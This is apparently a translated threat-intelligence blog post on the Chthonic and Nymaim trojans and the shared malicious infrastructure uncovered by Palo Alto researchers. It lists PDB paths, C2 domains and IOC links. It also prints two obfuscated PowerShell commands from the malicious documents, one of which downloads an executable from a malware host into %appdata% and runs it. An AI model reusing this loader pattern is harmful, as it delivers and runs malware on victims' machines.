Recently a large number of malicious URLs and IP addresses have been exposed by security vendors. For example, when Palo Alto analyzed the malware using PowerShell, he found the "infrastructure" used by Trojans such as chthonic and nymaim.

Common PowerShell is usually launched from Microsoft office documents that use VBA macros, and further downloads and executes "real" malware. But recently found a sample of files downloaded from Notepad + + - chthonic ~! ~!

<null> , cMd.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli'; Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://notepad-plus-plus[.]org/repository/7.x/7.4.2/npp.7.4.2.Installer.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

Chthonic uses the above code to download files from the legal Notepad + + website.

By looking at the variables in the PowerShell command, Jeff white finally found 171 document samples, all of which are recent and have the same "bait" theme. It also extracts 24 URLs for downloading the payload.

A sample compiled in August showed Polish bait documents and even Polish strings: "do you really think I'm not a virus?"

cMd.exe   /c "p^Ow^ERS^hel^l^.e^x^e^  -nO^l -No^Ni^Nt^  -W^InDO^ws^ 1 -NoprO^FIle^  -eX^Ec^U  B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli'; Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://farhenzel[.]co/gls.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

After traversing 171 samples, we get the hash value list of the download file. Furthermore, it is found that the payload is smaller than the sample, which indicates that many documents download the same payload. These payloads involve the following PDB strings.

C:\RAMDrive\Charles\heaven\reams\Teac.pdb

C:\Cleaner\amuse\rang\AutoPopulate\la.pdb

C:\TableAdapter\encyclopedia\Parik.pdb

C:\ayakhnin\reprductive\distortedc.pdb

C:\positioning\scrapping\Szets\thi.pdb

C:\NeXT\volatile\legacyExchangeDNs.pdb

C:\Snapshot\Diskette\hiding\ROCKMA.pdb

C:\mdb\Changed\Container\praise.pdb

C:\helpers\better\Expr\Eight\DS.pdb

C:\V\regard\violates\update\AMBW\a.pdb

C:\executablery\constructed\IIc.pdb

C:\letterbxing\EVP\Chices\legit.pdb

C:\Biomuse\moment\705\cnvincing.pdb

C:\cataloging\Dr\VarianceShadows11.pdb

C:\dumplings\That\BIT\Warez\loc.pdb

C:\Lgisys\hypothesized\donatedc.pdb

C:\work\cr\nata\cpp\seven\seven\re

Once the file is downloaded and executed, the new process will launch a legal executable, such as "MSIEXEC. Exe", and inject code into it.

This code will then download further valid payloads through post requests to various websites. These HTTP requests match the known pattern of the bank Trojan named chthonic, a variant of Zeus.

amellet[.]bit

danrnysvp[.]com

ejtmjealr[.]com

Firop[.]com

gefinsioje[.]com

gesofgamd[.]com

ponedobla[.]bit

Unoset[.]com

Palo Alto presents three major events for these sites in July.

ejtmjealr[.]com

gefinsioje[.]com

gesofgamd[.]com

ponedobla[.]bit

From the above four stations, they found that more than 5520 samples are making HTTP requests for them, and these samples have been identified as another Trojan horse for downloading programs, named nymaim ~! ~!

And 'ejtmjealr [.] com' is very similar to 'ejdqzkd [.] com'. Talos has discussed in detail how nymaim uses these domains before.

Using maltego and passivetotal to analyze the above domains, we found a total of 707 IP addresses related to them.

Next, use reverse DNS to discover more sites associated with them. Further analysis also found that these "infrastructures" were also used to distribute other malware families, such as locky.

These "infrastructures" are also used to host illegal services, such as illegal forums, and some are used by malicious software hancitor

Some of them also involve, for example:

Premarket [.] WS similar domain names are used for illegal services;

Slilpp [.] WS, with quick review of accounts and user names similar to the typical Nigerian cybercrime model;

...

At present, 707 IP and 2611 domain names have been published on GitHub.

https://github.com/pan-unit42/iocs/tree/master/notepadcase

S thinks: there is multi-dimensional homology between malware, but for the traceability work of network crime, using the same C & C server and having the same network behavior is a relatively direct traceability evidence chain ~!

But the case illustrates from another perspective:

Because the domain name, C & C server and other resources required by network crime are important "resources" for any hacker or criminal organization, so in the era of network crime being gradually "international", it is the first choice for organizations to share basic information resources.

This kind of infrastructure cooperation mode between hackers and organizations will be dragged into the water by some low level individuals, such as this case.

However, in this case, malware with the same information resources (domain name, C & C server, etc.) will be difficult to prove to be from the same hacker or organization ~!

What should be congratulated is that this action will have an important impact on some hackers and organizations in any case ~!

At the same time, for the above address and domain name, as well as the associated malware and the "black hand" behind the analysis, it can be continued, children's shoes refueling ~!

Malwarebenchmark is also paying attention to some of the above address and domain name resources. Friends with information can communicate with each other! Please see our analysis of fishing in Nigeria in July

Relevant articles in the subscription number (click to read)

Alarm: Nigeria fishing is threatening global industrial enterprises

Reference resources:

https://www.cert.pl/en/news/single/nymaim-revisited/

https://researchcenter.paloaltonetworks.com/2017/08/unit42-the-curious-case-of-notepad-and-chthonic-exposing-a-malicious-infrastructure/